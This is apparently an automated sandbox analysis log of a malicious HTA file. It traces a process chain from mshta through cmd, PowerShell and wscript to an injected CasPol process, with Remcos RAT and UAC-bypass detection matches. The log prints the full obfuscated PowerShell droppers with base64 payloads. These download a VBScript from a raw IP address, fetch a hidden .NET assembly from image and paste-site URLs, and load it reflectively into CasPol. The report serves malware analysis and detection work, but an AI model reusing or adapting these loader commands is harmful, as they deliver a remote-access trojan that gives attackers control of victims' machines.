                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeingJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess Stats: CPU usage > 49%
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004158B9
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04FD76388_2_04FD7638
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04FDB8708_2_04FDB870
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04FDA6C88_2_04FDA6C8
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04FD20C18_2_04FD20C1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041D07112_2_0041D071
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004520D212_2_004520D2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043D09812_2_0043D098
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043715012_2_00437150
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004361AA12_2_004361AA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0042625412_2_00426254
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043137712_2_00431377
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043651C12_2_0043651C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041E5DF12_2_0041E5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044C73912_2_0044C739
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004367C612_2_004367C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004267CB12_2_004267CB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043C9DD12_2_0043C9DD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00432A4912_2_00432A49
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00436A8D12_2_00436A8D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CC0C12_2_0043CC0C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00436D4812_2_00436D48
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434D2212_2_00434D22
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426E7312_2_00426E73
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00440E2012_2_00440E20
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CE3B12_2_0043CE3B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00412F4512_2_00412F45
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00452F0012_2_00452F00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426FAD12_2_00426FAD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 40 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004338A5 appears 41 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433FB0 appears 55 times
                          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2003
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2003Jump to behavior
                          Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 8.2.powershell.exe.7205a48.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 8.2.powershell.exe.7205a48.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 8.2.powershell.exe.7205a48.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 8.2.powershell.exe.7205a48.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 8.2.powershell.exe.7205a48.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 8.2.powershell.exe.7205a48.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                          Source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                          Source: 00000008.00000002.1784462151.0000000007165000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                          Source: Process Memory Space: CasPol.exe PID: 6832, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                          Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@20/17@5/4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00416AB7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040E219
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041A63F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419BC4
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freesizedressfornaturalbeautyinthiscaseforyougood[1].tiffJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6012:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-GH3PRL
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_omlkdx1o.oej.ps1Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS"
                          Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaVirustotal: Detection: 27%
                          Source: greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaReversingLabs: Detection: 21%
                          Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta"
                          Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.cmdline"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0F9.tmp" "c:\Users\user\AppData\Local\Temp\eykjjr5p\CSC29E03D134814371801318532EC93FB.TMP"
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS"
